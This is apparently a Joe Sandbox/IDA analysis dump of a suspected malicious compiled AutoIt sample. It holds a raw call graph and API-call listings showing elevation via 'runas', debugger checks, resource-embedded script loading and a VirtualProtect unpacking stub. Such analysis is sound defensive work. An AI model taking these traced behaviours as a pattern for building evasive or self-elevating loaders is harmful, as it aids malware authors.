e87d2c 59 API calls 98354->98355 98360 e83eb6 Mailbox 98354->98360 98357 e83d82 98355->98357 98366 e83db8 Mailbox 98357->98366 98475 e87b52 98357->98475 98358 e87b52 59 API calls 98358->98366 98359 e83e89 98359->98360 98361 e87f41 59 API calls 98359->98361 98360->98145 98363 e83eaa 98361->98363 98362 e87f41 59 API calls 98362->98366 98364 e83f84 59 API calls 98363->98364 98364->98360 98365 e83f84 59 API calls 98365->98366 98366->98358 98366->98359 98366->98360 98366->98362 98366->98365 98478 e84d13 98367->98478 98372 e84f68 LoadLibraryExW 98488 e84cc8 98372->98488 98373 ebdd0f 98374 e84faa 84 API calls 98373->98374 98376 ebdd16 98374->98376 98378 e84cc8 3 API calls 98376->98378 98382 ebdd1e 98378->98382 98380 e84f8f 98381 e84f9b 98380->98381 98380->98382 98383 e84faa 84 API calls 98381->98383 98514 e8506b 98382->98514 98385 e837e6 98383->98385 98385->98152 98385->98153 98388 ebdd45 98522 e85027 98388->98522 98390 ebdd52 98392 ea0ff6 Mailbox 59 API calls 98391->98392 98393 e8380d 98392->98393 98393->98166 98395 e8862b 98394->98395 98397 e88652 98395->98397 98948 e88b13 69 API calls Mailbox 98395->98948 98397->98170 98399 e83eec 98398->98399 98400 e83f05 98398->98400 98401 e881a7 59 API calls 98399->98401 98402 e87d2c 59 API calls 98400->98402 98403 e8388b 98401->98403 98402->98403 98404 ea313d 98403->98404 98405 ea3149 98404->98405 98406 ea31be 98404->98406 98413 ea316e 98405->98413 98949 ea8d68 58 API calls __getptd_noexit 98405->98949 98951 ea31d0 60 API calls 3 library calls 98406->98951 98409 ea31cb 98409->98191 98410 ea3155 98950 ea8ff6 9 API calls __cftoe2_l 98410->98950 98412 ea3160 98412->98191 98413->98191 98415 e89436 98414->98415 98416 ea0ff6 Mailbox 59 API calls 98415->98416 98417 e89444 98416->98417 98418 e83936 98417->98418 98952 e8935c 59 API calls Mailbox 98417->98952 98420 e891b0 98418->98420 98953 e892c0 98420->98953 98422 e891bf 98423 ea0ff6 Mailbox 59 API calls 98422->98423 98424 e83944 98422->98424 98423->98424 98425 e89040 98424->98425 98426 
99650->99652 99651 ea2f80 __cinit 67 API calls 99651->99655 99652->99655 99653 ec3f50 99653->98349 99654 e88620 69 API calls 99654->99671 99655->99647 99655->99651 99655->99653 99657 e8eaba 99655->99657 99655->99671 99657->99671 99738 eea0b5 89 API calls 4 library calls 99657->99738 99659 e8a000 331 API calls 99659->99671 99660 e8f2f5 99742 eea0b5 89 API calls 4 library calls 99660->99742 99663 ec424f 99663->98349 99664 e88ea0 59 API calls 99664->99671 99668 eea0b5 89 API calls 99668->99671 99670 e8ebd8 99670->98349 99671->99654 99671->99659 99671->99660 99671->99664 99671->99668 99671->99670 99713 e880d7 59 API calls 2 library calls 99671->99713 99739 ed7405 59 API calls 99671->99739 99740 efc8d7 331 API calls 99671->99740 99741 efb851 331 API calls Mailbox 99671->99741 99743 e89df0 59 API calls Mailbox 99671->99743 99744 ef96db 331 API calls Mailbox 99671->99744 99673 e8f61a 99672->99673 99674 e8f7b0 99672->99674 99675 ec4848 99673->99675 99676 e8f626 99673->99676 99677 e87f41 59 API calls 99674->99677 99845 efbf80 331 API calls Mailbox 99675->99845 99843 e8f3f0 331 API calls 2 library calls 99676->99843 99683 e8f6ec Mailbox 99677->99683 99680 ec4856 99684 e8f790 99680->99684 99846 eea0b5 89 API calls 4 library calls 99680->99846 99682 e8f65d 99682->99680 99682->99683 99682->99684 99688 e84faa 84 API calls 99683->99688 99751 ef474d 99683->99751 99760 eecde5 99683->99760 99840 ee3e73 99683->99840 99684->98349 99686 e8f743 99686->99684 99844 e89df0 59 API calls Mailbox 99686->99844 99688->99686 99691->98349 99692->98349 99693->98349 99694->98279 99695->98284 99696->98349 99697->98285 99698->98285 99699->98285 99700->98349 99701->98349 99702->98349 99703->98349 99704->98349 99705->98349 99706->98334 99707->98334 99708->98334 99709->98334 99710->98334 99711->98334 99712->98334 99713->99671 99715 e8a01f 99714->99715 99732 e8a04d Mailbox 99714->99732 99716 ea0ff6 Mailbox 59 API calls 99715->99716 99716->99732 99717 e8b5d5 99718 e881a7 59 API calls 99717->99718 99731 
e8a1b7 99718->99731 99719 ed7405 59 API calls 99719->99732 99720 ea0ff6 59 API calls Mailbox 99720->99732 99721 e877c7 59 API calls 99721->99732 99724 e881a7 59 API calls 99724->99732 99726 ec047f 99747 eea0b5 89 API calls 4 library calls 99726->99747 99729 ec048e 99729->99646 99730 ea2f80 67 API calls __cinit 99730->99732 99731->99646 99732->99717 99732->99719 99732->99720 99732->99721 99732->99724 99732->99726 99732->99730 99732->99731 99733 ec0e00 99732->99733 99735 e8a6ba 99732->99735 99736 e8b5da 99732->99736 99745 e8ca20 331 API calls 2 library calls 99732->99745 99746 e8ba60 60 API calls Mailbox 99732->99746 99749 eea0b5 89 API calls 4 library calls 99733->99749 99748 eea0b5 89 API calls 4 library calls 99735->99748 99750 eea0b5 89 API calls 4 library calls 99736->99750 99737->99671 99738->99671 99739->99671 99740->99671 99741->99671 99742->99663 99743->99671 99744->99671 99745->99732 99746->99732 99747->99729 99748->99731 99749->99736 99750->99731 99752 e89997 84 API calls 99751->99752 99753 ef4787 99752->99753 99754 e863a0 94 API calls 99753->99754 99761 e877c7 59 API calls 99760->99761 99762 eece1a 99761->99762 99763 e877c7 59 API calls 99762->99763 99764 eece23 99763->99764 99968 ee4696 GetFileAttributesW 99840->99968 99843->99682 99844->99686 99845->99680 99846->99684 99969 ee3e7a 99968->99969 99970 ee46b1 FindFirstFileW 99968->99970 99969->99686 99970->99969 99971 ee46c6 FindClose 99970->99971 99971->99969 99972 f98070 99973 f98080 99972->99973 99974 f9819a LoadLibraryA 99973->99974 99978 f981df VirtualProtect VirtualProtect 99973->99978 99975 f981b1 99974->99975 99975->99973 99977 f981c3 GetProcAddress 99975->99977 99977->99975 99980 f981d9 ExitProcess 99977->99980 99979 f98244 99978->99979 99979->99979 99981 ec0226 99987 e8ade2 Mailbox 99981->99987 99983 ec0c86 99998 ed66f4 59 API calls Mailbox 99983->99998 99985 ec0c8f 99987->99983 99987->99985 99988 ec00e0 VariantClear 99987->99988 99989 e8b6c1 99987->99989 99992 efe237 99987->99992 99995 e89df0 59 
API calls Mailbox 99987->99995 99996 ed7405 59 API calls 99987->99996 99988->99987 99997 eea0b5 89 API calls 4 library calls 99989->99997 99999 efcdf1 99992->99999 99994 efe247 99994->99987 99995->99987 99996->99987 99997->99983 99998->99985 100000 e89997 84 API calls 99999->100000 100001 efce2e 100000->100001 100024 efce75 Mailbox 100001->100024 100037 efdab9 100001->100037 100003 efd0cd 100004 efd242 100003->100004 100008 efd0db 100003->100008 100076 efdbdc 92 API calls Mailbox 100004->100076 100007 efd251 100007->100008 100010 efd25d 100007->100010 100050 efcc82 100008->100050 100009 e89997 84 API calls 100025 efcec6 Mailbox 100009->100025 100010->100024 100015 efd114 100065 ea0e48 100015->100065 100018 efd12e 100071 eea0b5 89 API calls 4 library calls 100018->100071 100019 efd147 100021 e8942e 59 API calls 100019->100021 100023 efd153 100021->100023 100022 efd139 GetCurrentProcess TerminateProcess 100022->100019 100026 e891b0 59 API calls 100023->100026 100024->99994 100025->100003 100025->100009 100025->100024 100069 eef835 59 API calls 2 library calls 100025->100069 100070 efd2f3 61 API calls 2 library calls 100025->100070 100027 efd169 100026->100027 100036 efd190 100027->100036 100072 e88ea0 59 API calls Mailbox 100027->100072 100029 efd17f 100073 efd95d 107 API calls _free 100029->100073 100030 efd2b8 100030->100024 100033 efd2cc FreeLibrary 100030->100033 100033->100024 100036->100030 100074 e88ea0 59 API calls Mailbox 100036->100074 100075 e89e9c 60 API calls Mailbox 100036->100075 100077 efd95d 107 API calls _free 100036->100077 100038 e87faf 59 API calls 100037->100038 100039 efdad4 CharLowerBuffW 100038->100039 100078 edf658 100039->100078 100043 e877c7 59 API calls 100044 efdb0d 100043->100044 100045 e879ab 59 API calls 100044->100045 100046 efdb24 100045->100046 100048 e87e8c 59 API calls 100046->100048 100047 efdb6c Mailbox 100047->100025 100049 efdb30 Mailbox 100048->100049 100049->100047 100085 efd2f3 61 API calls 2 library calls 100049->100085 
100051 efcc9d 100050->100051 100055 efccf2 100050->100055 100052 ea0ff6 Mailbox 59 API calls 100051->100052 100053 efccbf 100052->100053 100054 ea0ff6 Mailbox 59 API calls 100053->100054 100053->100055 100054->100053 100056 efdd64 100055->100056 100057 efdf8d Mailbox 100056->100057 100064 efdd87 _strcat _wcscpy __NMSG_WRITE 100056->100064 100057->100015 100058 e89d46 59 API calls 100058->100064 100059 e89c9c 59 API calls 100059->100064 100060 e89cf8 59 API calls 100060->100064 100061 ea594c 58 API calls __crtLCMapStringA_stat 100061->100064 100062 e89997 84 API calls 100062->100064 100064->100057 100064->100058 100064->100059 100064->100060 100064->100061 100064->100062 100088 ee5b29 61 API calls 2 library calls 100064->100088 100066 ea0e5d 100065->100066 100067 ea0ef5 VirtualProtect 100066->100067 100068 ea0ec3 100066->100068 100067->100068 100068->100018 100068->100019 100069->100025 100070->100025 100071->100022 100072->100029 100073->100036 100074->100036 100075->100036 100076->100007 100077->100036 100080 edf683 __NMSG_WRITE 100078->100080 100079 edf6c2 100079->100043 100079->100049 100080->100079 100083 edf6b8 100080->100083 100084 edf769 100080->100084 100083->100079 100086 e87a24 61 API calls 100083->100086 100084->100079 100087 e87a24 61 API calls 100084->100087 100085->100047 100086->100083 100087->100084 100088->100064 100089 e83633 100090 e8366a 100089->100090 100091 e83688 100090->100091 100092 e836e7 100090->100092 100130 e836e5 100090->100130 100096 e8375d PostQuitMessage 100091->100096 100097 e83695 100091->100097 100094 e836ed 100092->100094 100095 ebd31c 100092->100095 100093 e836ca NtdllDefWindowProc_W 100099 e836d8 100093->100099 100100 e836f2 100094->100100 100101 e83715 SetTimer RegisterClipboardFormatW 100094->100101 100139 e911d0 10 API calls Mailbox 100095->100139 100096->100099 100102 ebd38f 100097->100102 100103 e836a0 100097->100103 100109 e836f9 KillTimer 100100->100109 100110 ebd2bf 100100->100110 100101->100099 100104 e8373e 
CreatePopupMenu 100101->100104 100143 ee2a16 71 API calls _memset 100102->100143 100105 e836a8 100103->100105 100106 e83767 100103->100106 100104->100099 100111 e836b3 100105->100111 100112 ebd374 100105->100112 100137 e84531 64 API calls _memset 100106->100137 100108 ebd343 100140 e911f3 331 API calls Mailbox 100108->100140 100134 e844cb Shell_NotifyIconW _memset 100109->100134 100116 ebd2f8 MoveWindow 100110->100116 100117 ebd2c4 100110->100117 100119 e8374b 100111->100119 100120 e836be 100111->100120 100112->100093 100142 ed817e 59 API calls Mailbox 100112->100142 100113 ebd3a1 100113->100093 100113->100099 100116->100099 100122 ebd2c8 100117->100122 100123 ebd2e7 SetFocus 100117->100123 100136 e845df 81 API calls _memset 100119->100136 100120->100093 100141 e844cb Shell_NotifyIconW _memset 100120->100141 100121 e8375b 100121->100099 100122->100120 100126 ebd2d1 100122->100126 100123->100099 100124 e8370c 100135 e83114 DeleteObject DestroyWindow Mailbox 100124->100135 100138 e911d0 10 API calls Mailbox 100126->100138 100130->100093 100132 ebd368 100133 e843db 68 API calls 100132->100133 100133->100130 100134->100124 100135->100099 100136->100121 100137->100121 100138->100099 100139->100108 100140->100120 100141->100132 100142->100130 100143->100113 100144 e81055 100149 e82649 100144->100149 100147 ea2f80 __cinit 67 API calls 100148 e81064 100147->100148 100150 e877c7 59 API calls 100149->100150 100151 e826b7 100150->100151 100156 e83582 100151->100156 100153 e82754 100154 e8105a 100153->100154 100159 e83416 59 API calls 2 library calls 100153->100159 100154->100147 100160 e835b0 100156->100160 100159->100153 100161 e835bd 100160->100161 100162 e835a1 100160->100162 100161->100162 100163 e835c4 RegOpenKeyExW 100161->100163 100162->100153 100163->100162 100164 e835de RegQueryValueExW 100163->100164 100165 e835ff 100164->100165 100166 e83614 RegCloseKey 100164->100166 100165->100166 100166->100162 100167 e81066 100172 e8f8cf 100167->100172 100169 e8106c 100170 
ea2f80 __cinit 67 API calls 100169->100170 100171 e81076 100170->100171 100173 e8f8f0 100172->100173 100205 ea0143 100173->100205 100177 e8f937 100178 e877c7 59 API calls 100177->100178 100179 e8f941 100178->100179 100180 e877c7 59 API calls 100179->100180 100181 e8f94b 100180->100181 100182 e877c7 59 API calls 100181->100182 100183 e8f955 100182->100183 100184 e877c7 59 API calls 100183->100184 100185 e8f993 100184->100185 100186 e877c7 59 API calls 100185->100186 100187 e8fa5e 100186->100187 100215 e960e7 100187->100215 100191 e8fa90 100192 e877c7 59 API calls 100191->100192 100193 e8fa9a 100192->100193 100243 e9ffde 100193->100243 100195 e8fae1 100196 e8faf1 GetStdHandle 100195->100196 100197 e8fb3d 100196->100197 100198 ec49d5 100196->100198 100199 e8fb45 OleInitialize 100197->100199 100198->100197 100200 ec49de 100198->100200 100199->100169 100250 ee6dda 64 API calls Mailbox 100200->100250 100202 ec49e5 100251 ee74a9 CreateThread 100202->100251 100204 ec49f1 CloseHandle 100204->100199 100252 ea021c 100205->100252 100208 ea021c 59 API calls 100209 ea0185 100208->100209 100210 e877c7 59 API calls 100209->100210 100211 ea0191 100210->100211 100212 e87d2c 59 API calls 100211->100212 100213 e8f8f6 100212->100213 100214 ea03a2 6 API calls 100213->100214 100214->100177 100216 e877c7 59 API calls 100215->100216 100217 e960f7 100216->100217 100218 e877c7 59 API calls 100217->100218 100219 e960ff 100218->100219 100259 e95bfd 100219->100259 100222 e95bfd 59 API calls 100223 e9610f 100222->100223 100224 e877c7 59 API calls 100223->100224 100225 e9611a 100224->100225 100226 ea0ff6 Mailbox 59 API calls 100225->100226 100227 e8fa68 100226->100227 100228 e96259 100227->100228 100229 e96267 100228->100229 100230 e877c7 59 API calls 100229->100230 100231 e96272 100230->100231 100232 e877c7 59 API calls 100231->100232 100233 e9627d 100232->100233 100234 e877c7 59 API calls 100233->100234 100235 e96288 100234->100235 100236 e877c7 59 API calls 100235->100236 100237 e96293 
100236->100237 100238 e95bfd 59 API calls 100237->100238 100239 e9629e 100238->100239 100240 ea0ff6 Mailbox 59 API calls 100239->100240 100241 e962a5 RegisterClipboardFormatW 100240->100241 100241->100191 100244 e9ffee 100243->100244 100245 ed5cc3 100243->100245 100246 ea0ff6 Mailbox 59 API calls 100244->100246 100262 ee9d71 60 API calls 100245->100262 100248 e9fff6 100246->100248 100248->100195 100249 ed5cce 100250->100202 100251->100204 100263 ee748f 65 API calls 100251->100263 100253 e877c7 59 API calls 100252->100253 100254 ea0227 100253->100254 100255 e877c7 59 API calls 100254->100255 100256 ea022f 100255->100256 100257 e877c7 59 API calls 100256->100257 100258 ea017b 100257->100258 100258->100208 100260 e877c7 59 API calls 100259->100260 100261 e95c05 100260->100261 100261->100222 100262->100249 100264 e81016 100269 e84ad2 100264->100269 100267 ea2f80 __cinit 67 API calls 100268 e81025 100267->100268 100270 ea0ff6 Mailbox 59 API calls 100269->100270 100271 e84ada 100270->100271 100273 e8101b 100271->100273 100276 e84a94 100271->100276 100273->100267 100277 e84a9d 100276->100277 100278 e84aaf 100276->100278 100279 ea2f80 __cinit 67 API calls 100277->100279 100280 e84afe 100278->100280 100279->100278 100281 e877c7 59 API calls 100280->100281 100282 e84b16 GetVersionExW 100281->100282 100283 e87d2c 59 API calls 100282->100283 100284 e84b59 100283->100284 100285 e87e8c 59 API calls 100284->100285 100290 e84b86 100284->100290 100286 e84b7a 100285->100286 100287 e87886 59 API calls 100286->100287 100287->100290 100288 e84bf1 GetCurrentProcess IsWow64Process 100289 e84c0a 100288->100289 100292 e84c89 GetSystemInfo 100289->100292 100293 e84c20 100289->100293 100290->100288 100291 ebdc8d 100290->100291 100294 e84c56 100292->100294 100304 e84c95 100293->100304 100294->100273 100297 e84c7d GetSystemInfo 100299 e84c47 100297->100299 100298 e84c32 100300 e84c95 2 API calls 100298->100300 100299->100294 100301 e84c4d FreeLibrary 100299->100301 100302 e84c3a 
GetNativeSystemInfo 100300->100302 100301->100294 100302->100299 100305 e84c2e 100304->100305 100306 e84c9e LoadLibraryA 100304->100306 100305->100297 100305->100298 100306->100305 100307 e84caf GetProcAddress 100306->100307 100307->100305
                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E83B7A
                                        • IsDebuggerPresent.KERNEL32 ref: 00E83B8C
                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F462F8,00F462E0,?,?), ref: 00E83BFD
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                          • Part of subcall function 00E90A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E83C26,00F462F8,?,?,?), ref: 00E90ACE
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E83C81
                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F393F0,00000010), ref: 00EBD4BC
                                        • SetCurrentDirectoryW.KERNEL32(?,00F462F8,?,?,?), ref: 00EBD4F4
                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F35D40,00F462F8,?,?,?), ref: 00EBD57A
                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00EBD581
                                          • Part of subcall function 00E83A58: GetSysColorBrush.USER32(0000000F), ref: 00E83A62
                                          • Part of subcall function 00E83A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E83A71
                                          • Part of subcall function 00E83A58: LoadIconW.USER32(00000063), ref: 00E83A88
                                          • Part of subcall function 00E83A58: LoadIconW.USER32(000000A4), ref: 00E83A9A
                                          • Part of subcall function 00E83A58: LoadIconW.USER32(000000A2), ref: 00E83AAC
                                          • Part of subcall function 00E83A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E83AD2
                                          • Part of subcall function 00E83A58: RegisterClassExW.USER32(?), ref: 00E83B28
                                          • Part of subcall function 00E839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83A15
                                          • Part of subcall function 00E839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83A36
                                          • Part of subcall function 00E839E7: ShowWindow.USER32(00000000,?,?), ref: 00E83A4A
                                          • Part of subcall function 00E839E7: ShowWindow.USER32(00000000,?,?), ref: 00E83A53
                                          • Part of subcall function 00E843DB: _memset.LIBCMT ref: 00E84401
                                          • Part of subcall function 00E843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E844A6
                                        Strings
                                        • This is a third-party compiled AutoIt script., xrefs: 00EBD4B4
                                        • runas, xrefs: 00EBD575
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                        • API String ID: 529118366-3287110873
                                        • Opcode ID: 4d23b9c6d6a63d94c3ba63cad3b5bcbfd79e210796daf9ad2d28163dde81bdfb
                                        • Instruction ID: 3775c2483fe015773c632b681b03d612dd4f800abf390d95848d4825fbab2a57
                                        • Opcode Fuzzy Hash: 4d23b9c6d6a63d94c3ba63cad3b5bcbfd79e210796daf9ad2d28163dde81bdfb
                                        • Instruction Fuzzy Hash: 3751E87490824DBBCF11FBB4DC05DED7BB4AB16704B105169F85DB21A2DAB08705EB22
                                        APIs
                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00E836D2
                                        • KillTimer.USER32(?,00000001), ref: 00E836FC
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E8371F
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00E8372A
                                        • CreatePopupMenu.USER32 ref: 00E8373E
                                        • PostQuitMessage.USER32(00000000), ref: 00E8375F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                        • String ID: TaskbarCreated
                                        • API String ID: 157504867-2362178303
                                        • Opcode ID: 698a1207bd5f2a3df22d58413c36ecefe23670d2eed878cff730e09ea5481f7b
                                        • Instruction ID: 5c456aaff0bc52bfd145af91423283ccb1728dd9e24018bf26a135a76a273029
                                        • Opcode Fuzzy Hash: 698a1207bd5f2a3df22d58413c36ecefe23670d2eed878cff730e09ea5481f7b
                                        • Instruction Fuzzy Hash: 9541E8B1104149B7DF24BB38DC09BBE3794EB12700F142529F90DF62A2EAA19A45B763
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E84FF9
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E84EEE,?,?,00000000,00000000), ref: 00E85010
                                        • LoadResource.KERNEL32(?,00000000,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F), ref: 00EBDD60
                                        • SizeofResource.KERNEL32(?,00000000,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F), ref: 00EBDD75
                                        • LockResource.KERNEL32(N,?,?,00E84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E84F8F,00000000), ref: 00EBDD88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT$N
                                        • API String ID: 3051347437-3852340653
                                        • Opcode ID: 4dd6143d0194331fef1c6bc3acd78229d9051e7dc8af089bf676796bde384281
                                        • Instruction ID: cff976cf2645bb55c9c9d56331425d1561372678e3c958ad07f466362d94e118
                                        • Opcode Fuzzy Hash: 4dd6143d0194331fef1c6bc3acd78229d9051e7dc8af089bf676796bde384281
                                        • Instruction Fuzzy Hash: CA119A75200704AFD7319B65DC48F677BB9FBC9B11F208568F40AA6660DB61E8049660
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 00E84B2B
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        • GetCurrentProcess.KERNEL32(?,00F0FAEC,00000000,00000000,?), ref: 00E84BF8
                                        • IsWow64Process.KERNEL32(00000000), ref: 00E84BFF
                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E84C45
                                        • FreeLibrary.KERNEL32(00000000), ref: 00E84C50
                                        • GetSystemInfo.KERNEL32(00000000), ref: 00E84C81
                                        • GetSystemInfo.KERNEL32(00000000), ref: 00E84C8D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                        • String ID:
                                        • API String ID: 1986165174-0
                                        • Opcode ID: 314e6b8118d025a97e6cf9ce13c0f4684e4dc048d3594600ba6caf8ecabea281
                                        • Instruction ID: e4433e16a8e8382cadb4df4ff79d8714ca836751c5677e6551bfb339e9f37e38
                                        • Opcode Fuzzy Hash: 314e6b8118d025a97e6cf9ce13c0f4684e4dc048d3594600ba6caf8ecabea281
                                        • Instruction Fuzzy Hash: CE91E57154EBC5DEC731EB6888511EBFFE4AF26304B48595ED0CFA3A41D224E908D719
                                        APIs
                                        • LoadLibraryA.KERNEL32(?), ref: 00F981AA
                                        • GetProcAddress.KERNEL32(?,00F91FF9), ref: 00F981C8
                                        • ExitProcess.KERNEL32(?,00F91FF9), ref: 00F981D9
                                        • VirtualProtect.KERNELBASE(00E80000,00001000,00000004,?,00000000), ref: 00F98227
                                        • VirtualProtect.KERNELBASE(00E80000,00001000), ref: 00F9823C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                        • String ID:
                                        • API String ID: 1996367037-0
                                        • Opcode ID: 0a0ba8430e0f6f890d9e441bdd86e8ddb72da2ca5b642b42065c3c4eaf24e4d4
                                        • Instruction ID: eb1c074b86aed675317035491e8594e2ef5a8b4cb6cf7fde6a80100693c962bf
                                        • Opcode Fuzzy Hash: 0a0ba8430e0f6f890d9e441bdd86e8ddb72da2ca5b642b42065c3c4eaf24e4d4
                                        • Instruction Fuzzy Hash: A451F772E457524AEF208E78DC807A1B794EB533B47280738C5E2CB3D6EF94584BA760
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00EBE7C1), ref: 00EE46A6
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00EE46B7
                                        • FindClose.KERNEL32(00000000), ref: 00EE46C7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
